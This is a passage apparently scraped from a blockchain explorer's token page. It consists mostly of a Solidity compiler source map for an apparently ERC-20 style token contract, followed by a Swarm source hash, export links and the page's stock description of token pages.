1;;;15705:68:0;;4592:2:1;15705:68:0;;;4574:21:1;4631:2;4611:18;;;4604:30;4670:31;4650:18;;;4643:59;4719:18;;15705:68:0;4390:353:1;15705:68:0;15817:51;15826:5;15833:7;15861:6;15842:16;:25;15817:8;:51::i;:::-;15573:329;15449:453;;;:::o;11638:846::-;-1:-1:-1;;;;;11775:18:0;;11767:68;;;;-1:-1:-1;;;11767:68:0;;4950:2:1;11767:68:0;;;4932:21:1;4989:2;4969:18;;;4962:30;5028:34;5008:18;;;5001:62;-1:-1:-1;;;5079:18:1;;;5072:35;5124:19;;11767:68:0;4748:401:1;11767:68:0;-1:-1:-1;;;;;11854:16:0;;11846:64;;;;-1:-1:-1;;;11846:64:0;;5356:2:1;11846:64:0;;;5338:21:1;5395:2;5375:18;;;5368:30;5434:34;5414:18;;;5407:62;-1:-1:-1;;;5485:18:1;;;5478:33;5528:19;;11846:64:0;5154:399:1;11846:64:0;-1:-1:-1;;;;;11996:15:0;;11974:19;11996:15;;;;;;;;;;;12030:21;;;;12022:72;;;;-1:-1:-1;;;12022:72:0;;5760:2:1;12022:72:0;;;5742:21:1;5799:2;5779:18;;;5772:30;5838:34;5818:18;;;5811:62;-1:-1:-1;;;5889:18:1;;;5882:36;5935:19;;12022:72:0;5558:402:1;12022:72:0;-1:-1:-1;;;;;12130:15:0;;;:9;:15;;;;;;;;;;;12148:20;;;12130:38;;12348:13;;;;;;;;;;:23;;;;;;12400:26;;1365:25:1;;;12348:13:0;;12400:26;;1338:18:1;12400:26:0;;;;;;;12439:37;13659:681;;-1:-1:-1;;;;;13749:21:0;;13741:67;;;;-1:-1:-1;;;13741:67:0;;6167:2:1;13741:67:0;;;6149:21:1;6206:2;6186:18;;;6179:30;6245:34;6225:18;;;6218:62;-1:-1:-1;;;6296:18:1;;;6289:31;6337:19;;13741:67:0;5965:397:1;13741:67:0;-1:-1:-1;;;;;13908:18:0;;13883:22;13908:18;;;;;;;;;;;13945:24;;;;13937:71;;;;-1:-1:-1;;;13937:71:0;;6569:2:1;13937:71:0;;;6551:21:1;6608:2;6588:18;;;6581:30;6647:34;6627:18;;;6620:62;-1:-1:-1;;;6698:18:1;;;6691:32;6740:19;;13937:71:0;6367:398:1;13937:71:0;-1:-1:-1;;;;;14044:18:0;;:9;:18;;;;;;;;;;;14065:23;;;14044:44;;14183:12;:22;;;;;;;14234:37;1365:25:1;;;14044:9:0;;:18;14234:37;;1338:18:1;14234:37:0;1219:177:1;14:548;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:196::-;635:20;;-1:-1:-1;;;;;684:54:1;;674:65;;664:93;;753:1;750;743:12;664:93;567:196;;;:::o;768:254::-;836:6;844;897:2;885:9;876:7;872:23;868:32;865:52;;;913:1;910;903:12;865:52;936:29;955:9;936:29;:::i;:::-;926:39;1012:2;997:18;;;;984:32;;-1:-1:-1;;;768:254:1:o;1401:328::-;1478:6;1486;1494;1547:2;1535:9;1526:7;1522:23;1518:32;1515:52;;;1563:1;1560;1553:12;1515:52;1586:29;1605:9;1586:29;:::i;:::-;1576:39;;1634:38;1668:2;1657:9;1653:18;1634:38;:::i;:::-;1624:48;;1719:2;1708:9;1704:18;1691:32;1681:42;;1401:328;;;;;:::o;1923:180::-;1982:6;2035:2;2023:9;2014:7;2010:23;2006:32;2003:52;;;2051:1;2048;2041:12;2003:52;-1:-1:-1;2074:23:1;;1923:180;-1:-1:-1;1923:180:1:o;2108:186::-;2167:6;2220:2;2208:9;2199:7;2195:23;2191:32;2188:52;;;2236:1;2233;2226:12;2188:52;2259:29;2278:9;2259:29;:::i;:::-;2249:39;2108:186;-1:-1:-1;;;2108:186:1:o;2299:260::-;2367:6;2375;2428:2;2416:9;2407:7;2403:23;2399:32;2396:52;;;2444:1;2441;2434:12;2396:52;2467:29;2486:9;2467:29;:::i;:::-;2457:39;;2515:38;2549:2;2538:9;2534:18;2515:38;:::i;:::-;2505:48;;2299:260;;;;;:::o;2564:380::-;2643:1;2639:12;;;;2686;;;2707:61;;2761:4;2753:6;2749:17;2739:27;;2707:61;2814:2;2806:6;2803:14;2783:18;2780:38;2777:161;;2860:10;2855:3;2851:20;2848:1;2841:31;2895:4;2892:1;2885:15;2923:4;2920:1;2913:15;2777:161;;2564:380;;;:::o;2949:222::-;3014:9;;;3035:10;;;3032:133;;;3087:10;3082:3;3078:20;3075:1;3068:31;3122:4;3119:1;3112:15;3150:4;3147:1;3140:15
Swarm Source
ipfs://d4b6646387bb0a2e9d01f73113a3ae76539568d464ca0a56b6403ca2cae1a8f7
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.